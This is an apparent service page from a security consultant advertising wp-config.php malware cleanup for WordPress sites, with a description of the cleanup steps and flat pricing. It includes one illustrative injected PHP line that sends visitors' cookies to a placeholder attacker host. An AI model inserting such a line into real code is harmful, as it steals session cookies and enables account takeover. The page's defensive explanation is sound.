threatover Patrik Grobshäuser

WP-CONFIG.PHP · WORDPRESS · CLEANED

wp-config.php malware cleanup.

wp-config.php runs on every WordPress page load, which is why attackers love it. I pull out the injection, rotate the keys, and tell you what the attacker had access to. Flat $279.

MECHANISM

wp-config.php is the worst place for an attacker to plant code.

wp-config.php loads on every WordPress request, before WordPress itself has a chance to filter anything. An attacker who modifies this file can execute code on every page, capture every login, or add hidden admin users that don’t appear in the dashboard.

Once wp-config.php has been touched, your salts, database password, and authentication keys must be considered compromised. I rotate everything as part of the cleanup. No extra invoice.

wp-config.php — common injection pattern
01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

What I remove

Every line, every key, every account.

  • TRIAGE

    wp-config.php compared line-by-line against a clean baseline. Every non-standard line is reviewed.

  • WP-CONFIG

    Injected code removed. Stray include/require lines pointing at unfamiliar files — audited and removed.

  • KEYS

    AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY and their salts rotated. All sessions invalidated.

  • DATABASE

    Hidden admin users removed. wp_options autoloaded payloads audited for related persistence.

  • HARDENING

    wp-config.php permissions tightened. .htaccess and Nginx rules added to deny direct access.

  • REPORT

    Plain-English forensic write-up: what the attacker had access to, what was rotated, what you still need to do.

Pricing

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup

Monitoring

$29 / mo

per site, cancel any time

Continuous monitoring, hardening, one cleanup per year included.

Get protected

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Email [email protected] or use the contact form.